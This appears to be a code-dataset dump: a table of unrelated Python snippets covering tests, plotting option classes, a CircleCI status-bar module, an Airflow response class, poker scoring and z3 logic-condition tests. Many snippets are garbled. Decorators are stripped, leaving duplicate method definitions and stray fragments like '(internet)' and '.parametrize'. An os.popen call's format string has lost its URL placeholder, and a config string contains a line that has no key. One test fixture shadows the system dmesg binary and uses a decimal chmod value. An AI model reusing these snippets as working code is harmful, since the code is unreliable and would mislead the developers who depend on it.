code stringlengths 281 23.7M |
|---|
def test_override_providers_context_manager():
p1 = providers.Provider()
p2 = providers.Provider()
container = Container()
with container.override_providers(p11=p1, p12=p2) as context_container:
assert (container is context_container)
assert (container.p11.last_overriding is p1)
assert (container.p12.last_overriding is p2)
assert (container.p11.last_overriding is None)
assert (container.p12.last_overriding is None) |
def create_all_search_playlist(groups, exaile):
tagname = get_tagname()
name = ('%s: %s' % (tagname.title(), ' and '.join(groups)))
search_string = ' '.join([('%s~"\\b%s\\b"' % (tagname, re.escape(group.replace(' ', '_')))) for group in groups])
_create_search_playlist(name, search_string, exaile) |
def test_create_key(db: Session):
with pytest.raises(KeyValidationError) as exc:
StorageConfig.create(db, data={'type': StorageType.s3.value, 'details': {'bucket': 'some-bucket'}})
assert (str(exc.value) == 'StorageConfig requires a name.')
sc = StorageConfig.create(db, data={'name': 'test dest', 'type': StorageType.s3.value, 'details': {'bucket': 'some-bucket', 'naming': 'some-filename-convention-enum', 'max_retries': 10}})
assert (sc.key == 'test_dest')
db.query(StorageConfig).filter_by(key='test_dest').delete() |
class CircleCI(IntervalModule):
settings = ('format', ('circleci_token', 'circleci access token'), ('repo_slug', 'repository identifier eg. "enkore/i3pystatus"'), ('time_format', 'passed directly to .strftime() for `last_build_started`'), ('repo_status_map', 'map representing how to display status'), ('duration_format', '`last_build_duration` format string'), ('status_color_map', 'color for all text based on status'), ('color', 'color for all text not otherwise colored'), ('workflow_name', '[WORKFLOWS_ONLY] if specified, monitor this workflows status. if not specified this module will default to reporting the status of your last build'), ('workflow_branch', '[WORKFLOWS_ONLY] if specified, monitor the workflows in this branch'))
required = ('circleci_token', 'repo_slug')
format = '{repo_owner}/{repo_name}-{repo_status} [({last_build_started}({last_build_duration}))]'
short_format = '{repo_name}-{repo_status}'
time_format = '%m/%d'
duration_format = '%m:%S'
status_color_map = None
repo_slug = None
circleci_token = None
repo_status_map = None
color = '#DDDDDD'
workflow_name = None
workflow_branch = None
circleci = None
on_leftclick = 'open_build_webpage'
def init(self):
self.repo_status = None
self.last_build_duration = None
self.last_build_started = None
(self.repo_owner, self.repo_name) = self.repo_slug.split('/')
self.workflows = ((self.workflow_name is not None) or (self.workflow_branch is not None))
def _format_time(self, time):
_datetime = dateutil.parser.parse(time)
return _datetime.strftime(self.time_format)
(internet)
def run(self):
if (self.circleci is None):
self.circleci = Api(self.circleci_token)
if self.workflows:
if (self.workflow_branch and (not self.workflow_name)):
self.output = dict(full_text='workflow_name must be specified!')
return
project = {p['reponame']: p for p in self.circleci.get_projects()}.get(self.repo_name)
if (not self.workflow_branch):
self.workflow_branch = project.get('default_branch')
workflow_info = project['branches'].get(self.workflow_branch)['latest_workflows'].get(self.workflow_name)
self.last_build_started = self._format_time(workflow_info.get('created_at'))
self.repo_status = workflow_info.get('status')
self.last_build_duration = ''
else:
self.repo_summary = self.circleci.get_project_build_summary(self.repo_owner, self.repo_name, limit=1)
if (len(self.repo_summary) != 1):
return
self.repo_summary = self.repo_summary[0]
self.repo_status = self.repo_summary.get('status')
self.last_build_started = self._format_time(self.repo_summary.get('queued_at'))
try:
self.last_build_duration = TimeWrapper((self.repo_summary.get('build_time_millis') / 1000), default_format=self.duration_format)
except TypeError:
self.last_build_duration = 0
if self.repo_status_map:
self.repo_status = self.repo_status_map.get(self.repo_status, self.repo_status)
self.output = dict(full_text=formatp(self.format, **vars(self)), short_text=self.short_format.format(**vars(self)))
if self.status_color_map:
self.output['color'] = self.status_color_map.get(self.repo_status, self.color)
else:
self.output['color'] = self.color
def open_build_webpage(self):
if self.repo_summary.get('workflows'):
url_format = 'workflow-run/{}'.format(self.repo_summary['workflows']['workflow_id'])
else:
url_format = 'gh/{repo_owner}/{repo_name}/{job_number}'
os.popen('xdg-open > /dev/null'.format(url_format)) |
def _get_pred_labels_from_prob(dataframe: pd.DataFrame, prediction_column: list) -> List[str]:
array_prediction = dataframe[prediction_column].to_numpy()
prediction_ids = np.argmax(array_prediction, axis=(- 1))
prediction_labels = [prediction_column[x] for x in prediction_ids]
return prediction_labels |
def resistor_label(colors):
if (len(colors) == 1):
return f'0 ohms'
elif (len(colors) == 4):
value = ((10 * COLORS.index(colors[0])) + COLORS.index(colors[1]))
value *= (10 ** COLORS.index(colors[2]))
(value, unit) = color_code(value)
value = (int(value) if value.is_integer() else value)
return f'{value} {unit} {COLORS_TOLERANCE[colors[3]]}%'
else:
value = (((100 * COLORS.index(colors[0])) + (10 * COLORS.index(colors[1]))) + COLORS.index(colors[2]))
value *= (10 ** COLORS.index(colors[3]))
(value, unit) = color_code(value)
value = (int(value) if value.is_integer() else value)
return f'{value} {unit} {COLORS_TOLERANCE[colors[4]]}%' |
def test_check_typed_prims_invalid_bend():
geom_kwargs = {'coord_type': 'redund'}
h2o_zmat = 'O\n H 1 0.96\n H 1 0.96 2 104.5\n '
geom = geom_from_zmat_str(h2o_zmat, **geom_kwargs)
typed_prims = geom.internal.typed_prims
bend = typed_prims[2]
assert (bend[0] == PrimTypes.BEND)
h2o_linear_zmat = 'O\n H 1 0.96\n H 1 0.96 2 180.0\n '
geom_linear = geom_from_zmat_str(h2o_linear_zmat, **geom_kwargs)
valid_typed_prims = check_typed_prims_for_geom(geom_linear, typed_prims)
assert (bend not in valid_typed_prims) |
class OptionPlotoptionsFunnel3dSonificationContexttracksMappingPan(Options):
def mapFunction(self):
return self._config_get(None)
def mapFunction(self, value: Any):
self._config(value, js_type=False)
def mapTo(self):
return self._config_get(None)
def mapTo(self, text: str):
self._config(text, js_type=False)
def max(self):
return self._config_get(None)
def max(self, num: float):
self._config(num, js_type=False)
def min(self):
return self._config_get(None)
def min(self, num: float):
self._config(num, js_type=False)
def within(self):
return self._config_get(None)
def within(self, value: Any):
self._config(value, js_type=False) |
def list_router_factory(fides_model: FidesModelType, model_type: str) -> APIRouter:
router = APIRouter(prefix=f'{API_PREFIX}/{model_type}', tags=[fides_model.__name__])
(path='/', dependencies=[Security(verify_oauth_client_prod, scopes=[f'{CLI_SCOPE_PREFIX_MAPPING[model_type]}:{READ}'])], response_model=List[fides_model], name='List')
async def ls(db: AsyncSession=Depends(get_async_db)) -> List:
sql_model = sql_model_map[model_type]
return (await list_resource(sql_model, db))
return router |
class AirflowPipelineProcessorResponse(RuntimePipelineProcessorResponse):
_type = RuntimeProcessorType.APACHE_AIRFLOW
_name = 'airflow'
def __init__(self, git_url, run_url, object_storage_url, object_storage_path):
super().__init__(run_url, object_storage_url, object_storage_path)
self.git_url = git_url
def to_json(self):
response = super().to_json()
response['git_url'] = self.git_url
return response |
def extractNorthstarnovelsCom(item):
(vol, chp, frag, postfix) = extractVolChapterFragmentPostfix(item['title'])
if ((not (chp or vol)) or ('preview' in item['title'].lower())):
return None
tagmap = [('PRC', 'PRC', 'translated'), ('Loiterous', 'Loiterous', 'oel')]
for (tagname, name, tl_type) in tagmap:
if (tagname in item['tags']):
return buildReleaseMessageWithType(item, name, vol, chp, frag=frag, postfix=postfix, tl_type=tl_type)
return False |
def test_raises_if_username_in_blacklist():
requirements = UsernameRequirements(min=1, max=100, blacklist=set(['no']))
validator = UsernameValidator(requirements)
registration = UserRegistrationInfo(username='no', password='no', email='', group=4, language='no')
with pytest.raises(ValidationError) as excinfo:
validator(registration)
assert (excinfo.value.attribute == 'username')
assert ('forbidden username' in excinfo.value.reason) |
def zeroshot_cfg_string():
return '\n [nlp]\n lang = "en"\n pipeline = ["llm"]\n batch_size = 128\n\n [components]\n\n [components.llm]\n factory = "llm"\n\n [components.llm.task]\n _tasks = "spacy.TextCat.v1"\n labels = "Recipe"\n exclusive_classes = true\n\n [components.llm.task.normalizer]\n = "spacy.LowercaseNormalizer.v1"\n\n [components.llm.model]\n _models = "spacy.GPT-3-5.v2"\n ' |
class TestXGMIIPHY(unittest.TestCase):
def test_xgmii_rx(self):
csv_file = ((Path(__file__).parent / 'assets') / 'xgmii_bus_capture.csv')
xgmii_injector = XGMII64bCSVReader(csv_file.resolve(), complete_trailing_transaction=True)
xgmii_collector = XGMIICollector(min_interframegap=5, tolerate_dic=False, debug_print=True)
xgmii_interface = Record([('rx_ctl', 8), ('rx_data', 64), ('tx_ctl', 8), ('tx_data', 64)])
dut = LiteEthPHYXGMIIRX(xgmii_interface, 64)
recvd_packets = []
run_simulation(dut, [xgmii_injector.inject(xgmii_interface), xgmii_collector.collect(xgmii_interface, tap_signals='rx', stop_cond=(lambda : (xgmii_injector.done() and (xgmii_collector.current_packet is None)))), stream_collector(dut.source, dest=recvd_packets, stop_cond=xgmii_injector.done, seed=42, debug_print=True, ready_rand=0)])
self.assertTrue((len(recvd_packets) == len(xgmii_collector.packets)), 'Different number of received and sent packets: {} vs. {}!'.format(len(recvd_packets), len(xgmii_collector.packets)))
for (p, (recvd, sent)) in enumerate(zip(recvd_packets, xgmii_collector.packets)):
self.assertTrue((len(recvd.data) == len(sent)), ('Packet sent and received with different length: {} vs. {} ' + 'at packet {}!').format(len(recvd.data), len(sent), p))
for (i, (a, b)) in enumerate(zip(recvd.data, sent)):
self.assertTrue((a == b), ('Byte sent and received differ: {} vs. {} at {} byte of ' + 'packet {}').format(a, b, i, p))
def test_xgmii_stream_loopback(self):
csv_file = ((Path(__file__).parent / 'assets') / 'xgmii_bus_capture.csv')
xgmii_injector = XGMII64bCSVReader(csv_file.resolve(), complete_trailing_transaction=True)
xgmii_rx_collector = XGMIICollector(min_interframegap=5, tolerate_dic=False, debug_print=True)
xgmii_tx_collector = XGMIICollector(min_interframegap=12, tolerate_dic=True, debug_print=True)
class DUT(Module):
def __init__(self):
self.xgmii_interface = Record([('rx_ctl', 8), ('rx_data', 64), ('tx_ctl', 8), ('tx_data', 64)])
self.submodules.ethphy = ClockDomainsRenamer({'eth_tx': 'sys', 'eth_rx': 'sys'})(LiteEthPHYXGMII(Record([('rx', 1), ('tx', 1)]), self.xgmii_interface, model=True))
self.submodules.loopback_fifo = SyncFIFO(self.ethphy.source.payload.layout, 4, True)
self.comb += [self.ethphy.source.connect(self.loopback_fifo.sink), self.loopback_fifo.source.connect(self.ethphy.sink)]
dut = DUT()
run_simulation(dut, [xgmii_rx_collector.collect(dut.xgmii_interface, tap_signals='rx', stop_cond=(lambda : (xgmii_injector.done() and (xgmii_rx_collector.current_packet is None)))), xgmii_tx_collector.collect(dut.xgmii_interface, tap_signals='tx', stop_cond=(lambda : (xgmii_injector.done() and (xgmii_tx_collector.current_packet is None) and (len(xgmii_tx_collector.packets) >= len(xgmii_rx_collector.packets))))), xgmii_injector.inject(dut.xgmii_interface, stop_cond=(lambda : ((not xgmii_rx_collector.collecting) and (not xgmii_tx_collector.collecting))))])
self.assertTrue((len(xgmii_rx_collector.packets) == len(xgmii_tx_collector.packets)), 'Different number of sent and received packets: {} vs. {}!'.format(len(xgmii_rx_collector.packets), len(xgmii_tx_collector.packets)))
for (p, (recvd, sent)) in enumerate(zip(xgmii_tx_collector.packets, xgmii_rx_collector.packets)):
self.assertTrue((len(recvd) == len(sent)), ('Packet sent and received with different length: {} vs. {} at ' + 'packet {}!').format(len(recvd), len(sent), p))
for (i, (a, b)) in enumerate(zip(recvd, sent)):
self.assertTrue((a == b), ('Byte sent and received differ: {} vs. {} at {} byte of ' + 'packet {}').format(a, b, i, p)) |
class PDTable():
def __init__(self, chart, aspList=const.MAJOR_ASPECTS):
pd = PrimaryDirections(chart)
self.table = pd.getList(aspList)
def view(self, arcmin, arcmax):
res = []
for direction in self.table:
if (arcmin < direction[0] < arcmax):
res.append(direction)
return res
def bySignificator(self, ID):
res = []
for direction in self.table:
if (ID in direction[2]):
res.append(direction)
return res
def byPromissor(self, ID):
res = []
for direction in self.table:
if (ID in direction[1]):
res.append(direction)
return res |
def test_outcome_by_span_exception(elasticapm_client):
elasticapm_client.begin_transaction('test')
try:
with elasticapm.capture_span('fail', 'test_type'):
assert False
except AssertionError:
pass
with elasticapm.capture_span('success', 'test_type'):
pass
elasticapm_client.end_transaction('test')
transactions = elasticapm_client.events[TRANSACTION]
spans = elasticapm_client.spans_for_transaction(transactions[0])
assert ((spans[0]['name'] == 'fail') and (spans[0]['outcome'] == 'failure'))
assert ((spans[1]['name'] == 'success') and (spans[1]['outcome'] == 'success')) |
def start_controller(folder: Path, command: str, tasks_per_node: int=1, cuda_devices: str='', timeout_min: float=5.0, signal_delay_s: int=30, stderr_to_stdout: bool=False, setup: tp.Sequence[str]=()) -> "subprocess.Popen['bytes']":
env = dict(os.environ)
env.update(SUBMITIT_LOCAL_NTASKS=str(tasks_per_node), SUBMITIT_LOCAL_COMMAND=command, SUBMITIT_LOCAL_TIMEOUT_S=str(int((60 * timeout_min))), SUBMITIT_LOCAL_SIGNAL_DELAY_S=str(int(signal_delay_s)), SUBMITIT_LOCAL_NODEID='0', SUBMITIT_LOCAL_JOB_NUM_NODES='1', SUBMITIT_STDERR_TO_STDOUT=('1' if stderr_to_stdout else ''), SUBMITIT_EXECUTOR='local', CUDA_VISIBLE_DEVICES=cuda_devices, SUBMITIT_LOCAL_WITH_SHELL=('1' if setup else ''))
proc_cmd: tp.Any = [sys.executable, '-m', 'submitit.local._local', str(folder)]
need_shell = bool(setup)
if need_shell:
proc_cmd = ' && '.join((list(setup) + [shlex.join(proc_cmd)]))
process = subprocess.Popen(proc_cmd, shell=need_shell, env=env)
return process |
class PoseUtils():
def __init__(self):
pass
def bullet_pos_to_unity_pos(self, pos: list):
return [(- pos[1]), pos[2], pos[0]]
def unity_pos_to_bullet_pos(self, pos: list):
return [pos[2], (- pos[0]), pos[1]]
def bullet_qua_to_unity_qua(self, qua: list):
return [(- qua[1]), qua[2], qua[0], (- qua[3])]
def unity_qua_to_bullet_qua(self, qua: list):
return [qua[2], (- qua[0]), qua[1], (- qua[3])]
def bullet_scale_to_unity_scale(self, scale: list):
return [scale[1], scale[2], scale[0]]
def unity_scale_to_bullet_scale(self, scale: list):
return [scale[2], scale[0], scale[1]] |
def get_right_audio_support_and_sampling_rate(audio_format: str, sampling_rate: int):
if (sampling_rate and ((sampling_rate < 8000) or (sampling_rate > 192000))):
raise ProviderException('Sampling rate must lie in the range of 8 kHz to 192 kHz')
if (not audio_format):
audio_format = 'mp3'
right_audio_format = next(filter((lambda x: (x[0] == audio_format)), audio_format_list_extensions), None)
file_extension = right_audio_format[1]
audio_format = audio_format.replace('-', ';codecs=')
audio_format = f'audio/{audio_format}'
if (not sampling_rate):
if right_audio_format[2]:
raise ProviderException(f"You must specify a sampling rate for the '{audio_format}' audio format")
return (file_extension, audio_format)
if (right_audio_format[3] is None):
return (file_extension, audio_format)
if (isinstance(right_audio_format[3], list) and (len(right_audio_format[3]) > 0)):
nearest_rate = min(right_audio_format[3], key=(lambda x: abs((x - sampling_rate))))
return (file_extension, f'{audio_format};rate={nearest_rate}')
return (file_extension, f'{audio_format};rate={sampling_rate}') |
class OptionPlotoptionsTimelineSonificationTracksMappingGapbetweennotes(Options):
def mapFunction(self):
return self._config_get(None)
def mapFunction(self, value: Any):
self._config(value, js_type=False)
def mapTo(self):
return self._config_get(None)
def mapTo(self, text: str):
self._config(text, js_type=False)
def max(self):
return self._config_get(None)
def max(self, num: float):
self._config(num, js_type=False)
def min(self):
return self._config_get(None)
def min(self, num: float):
self._config(num, js_type=False)
def within(self):
return self._config_get(None)
def within(self, value: Any):
self._config(value, js_type=False) |
class TraditionalPokerScoreDetector(ScoreDetector):
def __init__(self, lowest_rank):
self._lowest_rank = lowest_rank
def get_score(self, cards):
cards = Cards(cards, self._lowest_rank)
score_functions = [(TraditionalPokerScore.STRAIGHT_FLUSH, cards.straight_flush), (TraditionalPokerScore.QUADS, cards.quads), (TraditionalPokerScore.FLUSH, cards.flush), (TraditionalPokerScore.FULL_HOUSE, cards.full_house), (TraditionalPokerScore.STRAIGHT, cards.straight), (TraditionalPokerScore.TRIPS, cards.trips), (TraditionalPokerScore.TWO_PAIR, cards.two_pair), (TraditionalPokerScore.PAIR, cards.pair), (TraditionalPokerScore.NO_PAIR, cards.no_pair)]
for (score_category, score_function) in score_functions:
score = score_function()
if score:
return TraditionalPokerScore(score_category, score)
raise RuntimeError('Unable to detect the score') |
class PdnsRecursorCfg(DummyPdnsCfg, models.Model):
pg_notify_payload = 'recursor_cfg_modified'
log_object_name = 'PowerDNS recursor config'
key = models.CharField(_('Key'), primary_key=True, max_length=32, null=False, unique=True, db_index=True, help_text='PowerDNS Recursor configuration parameter keys')
val = models.TextField(_('Value'), null=True, default=None, help_text='PowerDNS Recursor configuration parameter values')
change_date = models.IntegerField(_('Changed'), null=True, default=None, help_text='Timestamp of the last update.')
class Meta():
app_label = 'pdns'
verbose_name = _('PowerDNS recursor cfg entry')
verbose_name_plural = _('PowerDNS recursor config entries')
db_table = 'cfg_recursor' |
def _validate_end_states(end_states: List[str]) -> Tuple[(bool, str)]:
if (not isinstance(end_states, list)):
return (False, "Invalid type for roles. Expected list. Found '{}'.".format(type(end_states)))
for end_state in end_states:
if (not _is_valid_regex(END_STATE_REGEX_PATTERN, end_state)):
return (False, "Invalid name for end_state '{}'. End_state names must match the following regular expression: {} ".format(end_state, END_STATE_REGEX_PATTERN))
return (True, 'Dialogue end_states are valid.') |
def clear_tutorial(save_stats: dict[(str, Any)]) -> dict[(str, Any)]:
save_stats['tutorial_cleared']['Value'] = 1
if (save_stats['story_chapters']['Chapter Progress'][0] == 0):
save_stats['story_chapters']['Chapter Progress'][0] = 1
save_stats['story_chapters']['Times Cleared'][0][0] = 1
print('Successfully cleared the tutorial')
return save_stats |
def setup_to_fail():
with open('/usr/local/bin/dmesg', 'w') as f:
f.writelines({'/bin/dmesg | grep -v "Execute Disable"'})
os.chmod('/usr/local/bin/dmesg', 755)
print(shellexec('echo $PATH'))
print(shellexec('which dmesg'))
(yield None)
os.remove('/usr/local/bin/dmesg') |
class Matrix(GraphCanvas.Canvas):
name = 'Skin Matrix'
_option_cls = OptSkins.OptionsSkin
_js__builder__ = '\n var ctx = htmlObj.getContext("2d"); htmlObj.height = window.innerHeight; htmlObj.width = window.innerWidth;\n var matrix = "#$%^&*()*&^%+-/~{[|`]}";\n matrix = matrix.split(""); var columns = htmlObj.width / options.font_size; var drops = [];\n for(var x = 0; x < columns; x++){drops[x] = 1}\n function draw()\n {\n ctx.fillStyle = "rgba(0, 0, 0, 0.04)"; ctx.fillRect(0, 0, htmlObj.width, htmlObj.height);\n ctx.fillStyle = options.color; ctx.font = options.font_size + "px arial";\n for(var i = 0; i < drops.length; i++)\n {\n var text = matrix[Math.floor(Math.random()*matrix.length)];\n ctx.fillText(text, i* options.font_size, drops[i]* options.font_size);\n if(drops[i]* options.font_size > htmlObj.height && Math.random() > 0.975){ drops[i] = 0};\n drops[i]++;\n }\n }\n setInterval(draw, 35);\n '
def __str__(self):
self.page.properties.js.add_builders(self.refresh())
return ('<canvas %s>Your browser does not support the HTML5 canvas tag.</canvas>' % self.get_attrs(css_class_names=self.style.get_classes())) |
class DiscountCodeSchemaEvent(DiscountCodeSchemaPublic):
class Meta():
type_ = 'discount-code'
self_view = 'v1.discount_code_detail'
self_view_kwargs = {'id': '<id>'}
inflect = dasherize
_schema(pass_original=True)
def validate_quantity(self, data, original_data):
if ('id' in original_data['data']):
try:
discount_code = DiscountCode.query.filter_by(id=original_data['data']['id']).one()
except NoResultFound:
raise ObjectNotFound({'parameter': '{code}'}, 'DiscountCode: not found')
if ('min_quantity' not in data):
data['min_quantity'] = discount_code.min_quantity
if ('max_quantity' not in data):
data['max_quantity'] = discount_code.max_quantity
if ('tickets_number' not in data):
data['tickets_number'] = discount_code.tickets_number
DiscountCodeSchemaEvent.quantity_validation_helper(data)
if (data.get('tickets_number') and data.get('max_quantity')):
if ((data['max_quantity'] >= 0) and (data['tickets_number'] < data['max_quantity'])):
raise UnprocessableEntityError({'pointer': '/data/attributes/tickets-number'}, 'tickets-number should be greater than max-quantity')
_schema(pass_original=True)
def validate_date(self, data, original_data):
ends_at = data.get('valid_till', None)
if ('id' in original_data['data']):
try:
discount_code = DiscountCode.query.filter_by(id=original_data['data']['id']).one()
except NoResultFound:
raise ObjectNotFound({'parameter': '{code}'}, 'DiscountCode: not found')
if ('valid_from' not in data):
data['valid_from'] = discount_code.valid_from
ends_at = (data.get('valid_till') or discount_code.valid_expire_time)
if (ends_at and (data['valid_from'] > ends_at)):
raise UnprocessableEntityError({'pointer': '/data/attributes/valid-till'}, 'valid_till should be after valid_from')
events = Relationship(self_view='v1.discount_code_events', self_view_kwargs={'id': '<id>'}, related_view='v1.event_list', related_view_kwargs={'discount_code_id': '<id>'}, schema='EventSchemaPublic', many=True, type_='event') |
class ExecutionTimeout():
def __init__(self, seconds=0, error_message='Execution took longer than the allotted time'):
self.seconds = seconds
self.error_message = error_message
def _timeout_handler(self, signum, frame):
raise TimeoutError(self.error_message)
def __enter__(self):
if (self.seconds > 0):
signal.signal(signal.SIGALRM, self._timeout_handler)
signal.alarm(self.seconds)
def __exit__(self, type, value, traceback):
signal.alarm(0) |
class GetFileRequest(DatClass):
file_id: str
drive_id: str = None
url_expire_sec: int = field(default=14400, repr=False)
fields: GetFileFields = field(default='*', repr=False)
image_thumbnail_process: str = field(default='image/resize,w_160/format,jpeg', repr=False)
image_url_process: str = field(default='image/resize,w_1920/format,jpeg', repr=False)
video_thumbnail_process: str = field(default='video/snapshot,t_0,f_jpg,ar_auto,w_800', repr=False) |
class BaseModelTransformer(type_engine.TypeTransformer[pydantic.BaseModel]):
_TYPE_INFO = types.LiteralType(simple=types.SimpleType.STRUCT)
def __init__(self):
super().__init__(name='basemodel-transform', t=pydantic.BaseModel)
def get_literal_type(self, t: Type[pydantic.BaseModel]) -> types.LiteralType:
return types.LiteralType(simple=types.SimpleType.STRUCT)
def to_literal(self, ctx: FlyteContext, python_val: pydantic.BaseModel, python_type: Type[pydantic.BaseModel], expected: types.LiteralType) -> literals.Literal:
return serialization.serialize_basemodel(python_val)
def to_python_value(self, ctx: FlyteContext, lv: literals.Literal, expected_python_type: Type[pydantic.BaseModel]) -> pydantic.BaseModel:
basemodel_literals: BaseModelLiterals = lv.map.literals
basemodel_json_w_placeholders = read_basemodel_json_from_literalmap(basemodel_literals)
with deserialization.PydanticDeserializationLiteralStore.attach(basemodel_literals[serialization.OBJECTS_KEY].map):
return expected_python_type.parse_raw(basemodel_json_w_placeholders) |
class TestLogicConditionZ3():
def test_init_basic(self):
new_member = LogicCondition(Bool('x1'))
assert ((str(new_member) == 'x1') and isinstance(new_member, LogicCondition))
def test_init(self):
new_member = LogicCondition(Or(z3_symbol[1], And(z3_symbol[2], z3_symbol[3])))
assert ((str(new_member) == '((x1 | x2) & (x1 | x3))') and isinstance(new_member, LogicCondition))
def test_initialize_true(self):
true_value = LogicCondition.initialize_true(LogicCondition.generate_new_context())
assert (true_value.is_true and isinstance(true_value, LogicCondition))
def test_initialize_false(self):
false_value = LogicCondition.initialize_false(LogicCondition.generate_new_context())
assert (false_value.is_false and isinstance(false_value, LogicCondition))
def test_initialize_symbol(self):
symbol = LogicCondition.initialize_symbol('x1', LogicCondition.generate_new_context())
assert ((str(symbol) == 'x1') and isinstance(symbol, LogicCondition))
def test_and(self):
new_term = (LogicCondition(And(z3_symbol[1], z3_symbol[2])) & LogicCondition(And(z3_symbol[2], z3_symbol[3])))
assert ((str(new_term) == '(x1 & x2 & x3)') and isinstance(new_term, LogicCondition))
def test_iand(self):
term = (LogicCondition(z3_symbol[1]) & LogicCondition(z3_symbol[2]))
term &= LogicCondition(And(z3_symbol[2], z3_symbol[3]))
assert ((str(term) == '(x1 & x2 & x3)') and isinstance(term, LogicCondition))
def test_or(self):
new_term = (LogicCondition(And(z3_symbol[1], z3_symbol[2])) | LogicCondition(And(z3_symbol[2], z3_symbol[3])))
assert ((str(new_term) == '((x1 | x3) & x2)') and isinstance(new_term, LogicCondition))
def test_ior(self):
term = LogicCondition(And(z3_symbol[1], z3_symbol[2]))
term |= LogicCondition(And(z3_symbol[2], z3_symbol[3]))
assert ((str(term) == '((x1 | x3) & x2)') and isinstance(term, LogicCondition))
def test_invert(self):
term = (~ LogicCondition(And(z3_symbol[1], z3_symbol[2])))
assert ((str(term) == '(!x1 | !x2)') and isinstance(term, LogicCondition))
.parametrize('z3_term, operands', [(LogicCondition.initialize_true(LogicCondition.generate_new_context()), []), (LogicCondition.initialize_false(LogicCondition.generate_new_context()), []), (LogicCondition(z3_symbol[1]), []), ((LogicCondition(z3_symbol[1]) | LogicCondition(z3_symbol[2])), [LogicCondition(z3_symbol[1]), LogicCondition(z3_symbol[2])]), ((LogicCondition(z3_symbol[1]) & LogicCondition(z3_symbol[2])), [LogicCondition(z3_symbol[1]), LogicCondition(z3_symbol[2])]), ((~ LogicCondition.initialize_symbol('x1', LogicCondition.generate_new_context())), [LogicCondition(z3_symbol[1])]), (((LogicCondition(z3_symbol[1]) | LogicCondition(z3_symbol[2])) & LogicCondition(z3_symbol[3])), [(LogicCondition(z3_symbol[1]) | LogicCondition(z3_symbol[2])), LogicCondition(z3_symbol[3])])])
def test_operands(self, z3_term, operands):
assert ([str(op) for op in z3_term.operands] == [str(op) for op in operands])
.parametrize('term, result', _get_is_instance_test_case(true_value=True))
def test_is_true(self, term, result):
assert (term.is_true == result)
.parametrize('term, result', _get_is_instance_test_case(false_value=True))
def test_is_false(self, term, result):
assert (term.is_false == result)
.parametrize('term, result', _get_is_instance_test_case(or_f=True))
def test_is_disjunction(self, term, result):
assert (term.is_disjunction == result)
.parametrize('term, result', _get_is_instance_test_case(and_f=True))
def test_is_conjunction(self, term, result):
assert (term.is_conjunction == result)
.parametrize('term, result', _get_is_instance_test_case(neg_symbol=True))
def test_is_negation(self, term, result):
assert (term.is_negation == result)
.parametrize('term, result', _get_is_instance_test_case(symbol=True))
def test_is_symbol(self, term, result):
assert (term.is_symbol == result)
.parametrize('term1, term2, result', [(logic_x[1].copy(), logic_x[2].copy(), False), (logic_x[1].copy(), (~ logic_x[1].copy()), False), ((logic_x[1].copy() & logic_x[2].copy()), (logic_x[1].copy() & logic_x[2].copy()), True), ((logic_x[1].copy() & logic_x[2].copy()), logic_x[2].copy(), False), ((logic_x[1].copy() & logic_x[2].copy()), (logic_x[2].copy() & logic_x[1].copy()), True), ((logic_x[1].copy() & (logic_x[2].copy() | logic_x[3].copy())), ((logic_x[3].copy() | logic_x[2].copy()) & logic_x[1].copy()), True)])
def test_is_equal_to(self, term1, term2, result):
assert (term1.is_equal_to(term2) == result)
.parametrize('term, result', _get_normal_forms('cnf'))
def test_to_cnf(self, term, result):
assert term.is_equal_to(result)
.parametrize('term, result', _get_normal_forms('dnf'))
def test_to_dnf(self, term, result):
dnf_term = term.to_dnf()
assert dnf_term.z3.is_equal(dnf_term._condition, result)
.parametrize('term, simplified', [((((logic_x[1].copy() & (~ logic_x[2].copy())) & (logic_x[3].copy() | (~ (logic_x[4].copy() & logic_x[2].copy())))) & (~ ((logic_x[5].copy() & logic_x[2].copy()) & (~ logic_x[1].copy())))), (logic_x[1].copy() & (~ logic_x[2].copy()))), ((((logic_x[1].copy() | (logic_x[2].copy() & (~ logic_x[1].copy()))) | (logic_x[3].copy() & (~ (logic_x[1].copy() | logic_x[2].copy())))) | ((logic_x[5].copy() & logic_x[4].copy()) & (~ logic_x[1].copy()))), (((logic_x[1].copy() | logic_x[2].copy()) | logic_x[3].copy()) | (logic_x[5].copy() & logic_x[4].copy()))), (((((((logic_x[1].copy() & (~ logic_x[1].copy())) | (~ logic_x[2].copy())) | (logic_x[3].copy() & (logic_x[4].copy() | (~ logic_x[4].copy())))) | (~ ((logic_x[5].copy() & logic_x[2].copy()) & (~ logic_x[1].copy())))) | ((~ (logic_x[5].copy() & (~ logic_x[5].copy()))) & logic_x[1].copy())) | (~ (logic_x[3].copy() | (~ logic_x[3].copy())))), (((logic_x[1].copy() | (~ logic_x[5].copy())) | (~ logic_x[2].copy())) | logic_x[3].copy()))])
def test_simplify(self, term, simplified):
assert (term == simplified)
.parametrize('term, result', [(LogicCondition.initialize_true(LogicCondition.generate_new_context()), []), (LogicCondition.initialize_false(LogicCondition.generate_new_context()), []), (logic_x[1].copy(), [logic_x[1].copy()]), ((~ logic_x[1].copy()), [logic_x[1].copy()]), ((((logic_x[1].copy() & (~ logic_x[2].copy())) & (logic_x[3].copy() | (~ logic_x[4].copy()))) & (logic_x[5].copy() | logic_x[3].copy())), [logic_x[1].copy(), logic_x[2].copy(), logic_x[3].copy(), logic_x[4].copy(), logic_x[5].copy(), logic_x[3].copy()])])
def test_get_symbols(self, term, result):
assert (set((str(symbol) for symbol in term.get_symbols())) == set((str(symbol) for symbol in result)))
.parametrize('term, result', [(LogicCondition.initialize_true(LogicCondition.generate_new_context()), []), (LogicCondition.initialize_false(LogicCondition.generate_new_context()), []), (logic_x[1].copy(), [logic_x[1].copy()]), ((~ logic_x[1].copy()), [(~ logic_x[1].copy())]), ((logic_x[1].copy() | logic_x[2].copy()), [logic_x[1].copy(), logic_x[2].copy()]), (((~ logic_x[1].copy()) | logic_x[2].copy()), [(~ logic_x[1].copy()), logic_x[2].copy()]), ((logic_x[1].copy() & logic_x[2].copy()), [logic_x[1].copy(), logic_x[2].copy()]), ((((logic_x[1].copy() & (~ logic_x[2].copy())) & (logic_x[3].copy() | (~ logic_x[4].copy()))) & ((~ logic_x[5].copy()) | (~ logic_x[3].copy()))), [logic_x[1].copy(), (~ logic_x[2].copy()), logic_x[3].copy(), (~ logic_x[4].copy()), (~ logic_x[5].copy()), (~ logic_x[3].copy())])])
def test_get_literals(self, term, result):
assert (set((str(literal) for literal in term.get_literals())) == set((str(literal) for literal in result)))
